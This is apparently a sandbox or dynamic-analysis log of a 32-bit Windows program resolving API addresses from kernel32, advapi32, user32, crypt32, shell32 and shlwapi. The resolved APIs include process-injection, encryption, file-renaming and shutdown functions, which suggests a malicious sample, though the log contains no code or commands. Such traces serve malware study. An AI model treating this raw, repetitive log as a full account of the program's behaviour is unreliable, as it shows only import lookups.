Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x758d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x758d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 True 1
Fn
